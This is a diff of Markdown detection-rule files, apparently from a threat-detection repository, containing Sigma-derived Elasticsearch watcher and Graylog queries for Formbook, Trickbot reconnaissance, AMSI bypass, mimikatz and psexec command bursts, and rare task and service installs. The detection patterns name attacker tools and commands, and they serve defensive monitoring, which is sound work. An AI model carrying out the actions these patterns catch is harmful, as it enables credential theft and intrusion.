{{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
CommandLine.keyword:* echo EEEE *
CommandLine.keyword:* echo EEEE > *
```

6
Atomic_Threat_Coverage/Detection_Rules/win_malware_formbook.md
View File

@ -62,21 +62,21 @@ level: critical
### es-qs
```
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ \\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe OR C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(*\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe OR *\\ \\/c\\ del\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe OR *\\ \\/C\\ type\\ nul\\ >\\ \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <<EOF\n{\n "metadata": {\n "title": "Formbook Process Creation",\n "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",\n "tags": "",\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ \\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ \\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/032f5fb3-d959-41a5-9263-4173c802dc2b <<EOF\n{\n "metadata": {\n "title": "Formbook Process Creation",\n "description": "Detects Formbook like process executions that inject code into a set of files in the System32 folder, which executes a special command command line to delete the dropper from the AppData Temp folder. We avoid false positives by excluding all parent process with command line parameters.",\n "tags": "",\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))"\n },\n "trigger": {\n "schedule": {\n "interval": "30m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "(ParentCommandLine.keyword:(C\\\\:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\*.exe OR C\\\\:\\\\\\\\Windows\\\\\\\\SysWOW64\\\\\\\\*.exe) AND CommandLine.keyword:(*\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\AppData\\\\\\\\Local\\\\\\\\Temp\\\\\\\\*.exe OR *\\\\ \\\\/c\\\\ del\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe OR *\\\\ \\\\/C\\\\ type\\\\ nul\\\\ >\\\\ \\\\\\"C\\\\:\\\\\\\\Users\\\\\\\\*\\\\\\\\Desktop\\\\\\\\*.exe))",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.hits.total": {\n "not_eq": 0\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Formbook Process Creation\'",\n "body": "Hits:\\n{{#ctx.payload.hits.hits}}Hit on {{_source.@timestamp}}:\\n CommandLine = {{_source.CommandLine}}\\nParentCommandLine = {{_source.ParentCommandLine}}================================================================================\\n{{/ctx.payload.hits.hits}}",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```
### graylog
```
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
(ParentCommandLine.keyword:(C\\:\\\\Windows\\\\System32\\\\*.exe C\\:\\\\Windows\\\\SysWOW64\\\\*.exe) AND CommandLine.keyword:(* \\/c del \\"C\\:\\\\Users\\\\*\\\\AppData\\\\Local\\\\Temp\\\\*.exe * \\/c del \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe * \\/C type nul > \\"C\\:\\\\Users\\\\*\\\\Desktop\\\\*.exe))
```

2
Atomic_Threat_Coverage/Detection_Rules/win_malware_trickbot_recon_activity.md
View File

@ -24,7 +24,7 @@ description: Trickbot enumerates domain/network topology and executes certain co
references:
- https://www.sneakymonkey.net/2019/05/22/trickbot-analysis/
author: David Burkett
date: 12/28/2019
date: 2019/12/28
tags:
- attack.t1482
logsource:

2
Atomic_Threat_Coverage/Detection_Rules/win_multiple_suspicious_cli.md
View File

@ -93,7 +93,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <<EOF\n{\n "metadata": {\n "title": "Quick Execution of a Series of Suspicious Commands",\n "description": "Detects multiple suspicious process in a limited timeframe",\n "tags": [\n "car.2013-04-002"\n ],\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "5m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "MachineName.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 6\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Quick Execution of a Series of Suspicious Commands\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/61ab5496-748e-4818-a92f-de78e20fe7f1 <<EOF\n{\n "metadata": {\n "title": "Quick Execution of a Series of Suspicious Commands",\n "description": "Detects multiple suspicious process in a limited timeframe",\n "tags": [\n "car.2013-04-002"\n ],\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")"\n },\n "trigger": {\n "schedule": {\n "interval": "5m"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine:(\\"arp.exe\\" OR \\"at.exe\\" OR \\"attrib.exe\\" OR \\"cscript.exe\\" OR \\"dsquery.exe\\" OR \\"hostname.exe\\" OR \\"ipconfig.exe\\" OR \\"mimikatz.exe\\" OR \\"nbtstat.exe\\" OR \\"net.exe\\" OR \\"netsh.exe\\" OR \\"nslookup.exe\\" OR \\"ping.exe\\" OR \\"quser.exe\\" OR \\"qwinsta.exe\\" OR \\"reg.exe\\" OR \\"runas.exe\\" OR \\"sc.exe\\" OR \\"schtasks.exe\\" OR \\"ssh.exe\\" OR \\"systeminfo.exe\\" OR \\"taskkill.exe\\" OR \\"telnet.exe\\" OR \\"tracert.exe\\" OR \\"wscript.exe\\" OR \\"xcopy.exe\\" OR \\"pscp.exe\\" OR \\"copy.exe\\" OR \\"robocopy.exe\\" OR \\"certutil.exe\\" OR \\"vssadmin.exe\\" OR \\"powershell.exe\\" OR \\"wevtutil.exe\\" OR \\"psexec.exe\\" OR \\"bcedit.exe\\" OR \\"wbadmin.exe\\" OR \\"icacls.exe\\" OR \\"diskpart.exe\\")",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "MachineName",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 6\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Quick Execution of a Series of Suspicious Commands\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

6
Atomic_Threat_Coverage/Detection_Rules/win_powershell_amsi_bypass.md
View File

@ -6,7 +6,7 @@
| **Data Needed** | <ul><li>[DN_0002_4688_windows_process_creation_with_commandline](../Data_Needed/DN_0002_4688_windows_process_creation_with_commandline.md)</li><li>[DN_0003_1_windows_sysmon_process_creation](../Data_Needed/DN_0003_1_windows_sysmon_process_creation.md)</li></ul> |
| **Trigger** | <ul><li>[T1086: PowerShell](../Triggers/T1086.md)</li></ul> |
| **Severity Level** | high |
| **False Positives** | There are no documented False Positives for this Detection Rule yet |
| **False Positives** | <ul><li>Potential Admin Activity</li></ul> |
| **Development Status** | experimental |
| **References** | <ul><li>[https://twitter.com/mattifestation/status/735261176745988096](https://twitter.com/mattifestation/status/735261176745988096)</li><li>[https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120](https://www.hybrid-analysis.com/sample/0ced17419e01663a0cd836c9c2eb925e3031ffb5b18ccf35f4dea5d586d0203e?environmentId=120)</li></ul> |
| **Author** | Markus Neis |
@ -41,8 +41,8 @@ detection:
CommandLine:
- '*amsiInitFailed*'
condition: selection1 and selection2
falsepositives:
- Potential Admin Activity
falsepositives:
- Potential Admin Activity
level: high
```

2
Atomic_Threat_Coverage/Detection_Rules/win_rare_schtask_creation.md
View File

@ -56,7 +56,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <<EOF\n{\n "metadata": {\n "title": "Rare Scheduled Task Creations",\n "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.",\n "tags": [\n "attack.persistence",\n "attack.t1053",\n "attack.s0111"\n ],\n "query": "EventID:\\"106\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"106\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Scheduled Task Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b20f6158-9438-41be-83da-a5a16ac90c2b <<EOF\n{\n "metadata": {\n "title": "Rare Scheduled Task Creations",\n "description": "This rule detects rare scheduled task creations. Typically software gets installed on multiple systems and not only on a few. The aggregation and count function selects tasks with rare names.",\n "tags": [\n "attack.persistence",\n "attack.t1053",\n "attack.s0111"\n ],\n "query": "EventID:\\"106\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"106\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Scheduled Task Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

2
Atomic_Threat_Coverage/Detection_Rules/win_rare_schtasks_creations.md
View File

@ -59,7 +59,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b0d77106-7bb0-41fe-bd94-d1752164d066 <<EOF\n{\n "metadata": {\n "title": "Rare Schtasks Creations",\n "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code",\n "tags": [\n "attack.execution",\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1053",\n "car.2013-08-001"\n ],\n "query": "EventID:\\"4698\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"4698\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Schtasks Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/b0d77106-7bb0-41fe-bd94-d1752164d066 <<EOF\n{\n "metadata": {\n "title": "Rare Schtasks Creations",\n "description": "Detects rare scheduled tasks creations that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious code",\n "tags": [\n "attack.execution",\n "attack.privilege_escalation",\n "attack.persistence",\n "attack.t1053",\n "car.2013-08-001"\n ],\n "query": "EventID:\\"4698\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"4698\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "TaskName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Schtasks Creations\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

2
Atomic_Threat_Coverage/Detection_Rules/win_rare_service_installs.md
View File

@ -57,7 +57,7 @@ level: low
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/66bfef30-22a5-4fcd-ad44-8d81e60922ae <<EOF\n{\n "metadata": {\n "title": "Rare Service Installs",\n "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation",\n "attack.t1050",\n "car.2013-09-005"\n ],\n "query": "EventID:\\"7045\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"7045\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ServiceFileName.keyword",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Service Installs\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/66bfef30-22a5-4fcd-ad44-8d81e60922ae <<EOF\n{\n "metadata": {\n "title": "Rare Service Installs",\n "description": "Detects rare service installs that only appear a few times per time frame and could reveal password dumpers, backdoor installs or other types of malicious services",\n "tags": [\n "attack.persistence",\n "attack.privilege_escalation",\n "attack.t1050",\n "car.2013-09-005"\n ],\n "query": "EventID:\\"7045\\""\n },\n "trigger": {\n "schedule": {\n "interval": "7d"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "EventID:\\"7045\\"",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "ServiceFileName",\n "size": 10,\n "order": {\n "_count": "asc"\n }\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "lt": 5\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Rare Service Installs\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
```

2
Atomic_Threat_Coverage/Detection_Rules/win_susp_commands_recon_activity.md
View File

@ -78,7 +78,7 @@ level: medium
### xpack-watcher
```
curl -s -XPUT -H \'Content-Type: application/json\' --data-binary @- localhost:9200/_watcher/watch/2887e914-ce96-435f-8105-593937e90757 <<EOF\n{\n "metadata": {\n "title": "Reconnaissance Activity with Net Command",\n "description": "Detects a set of commands often used in recon stages by different attack groups",\n "tags": [\n "attack.discovery",\n "attack.t1087",\n "attack.t1082",\n "car.2016-03-001"\n ],\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)"\n },\n "trigger": {\n "schedule": {\n "interval": "15s"\n }\n },\n "input": {\n "search": {\n "request": {\n "body": {\n "size": 0,\n "query": {\n "bool": {\n "must": [\n {\n "query_string": {\n "query": "CommandLine.keyword:(tasklist OR net\\\\ time OR systeminfo OR whoami OR nbtstat OR net\\\\ start OR *\\\\\\\\net1\\\\ start OR qprocess OR nslookup OR hostname.exe OR *\\\\\\\\net1\\\\ user\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"domain\\\\ admins\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ group\\\\ \\\\\\"Exchange\\\\ Trusted\\\\ Subsystem\\\\\\"\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ accounts\\\\ \\\\/domain OR *\\\\\\\\net1\\\\ user\\\\ net\\\\ localgroup\\\\ administrators OR netstat\\\\ \\\\-an)",\n "analyze_wildcard": true\n }\n }\n ],\n "filter": {\n "range": {\n "timestamp": {\n "gte": "now-30m/m"\n }\n }\n }\n }\n },\n "aggs": {\n "by": {\n "terms": {\n "field": "CommandLine.keyword",\n "size": 10,\n "order": {\n "_count": "desc"\n },\n "min_doc_count": 5\n }\n }\n }\n },\n "indices": []\n }\n }\n },\n "condition": {\n "compare": {\n "ctx.payload.aggregations.by.buckets.0.doc_count": {\n "gt": 4\n }\n }\n },\n "actions": {\n "send_email": {\n "email": {\n "to": "root@localhost",\n "subject": "Sigma Rule \'Reconnaissance Activity with Net Command\'",\n "body": "Hits:\\n{{#aggregations.by.buckets}}\\n {{key}} {{doc_count}}\\n{{/aggregations.by.buckets}}\\n",\n "attachments": {\n "data.json": {\n "data": {\n "format": "json"\n }\n }\n }\n }\n }\n }\n}\nEOF\n
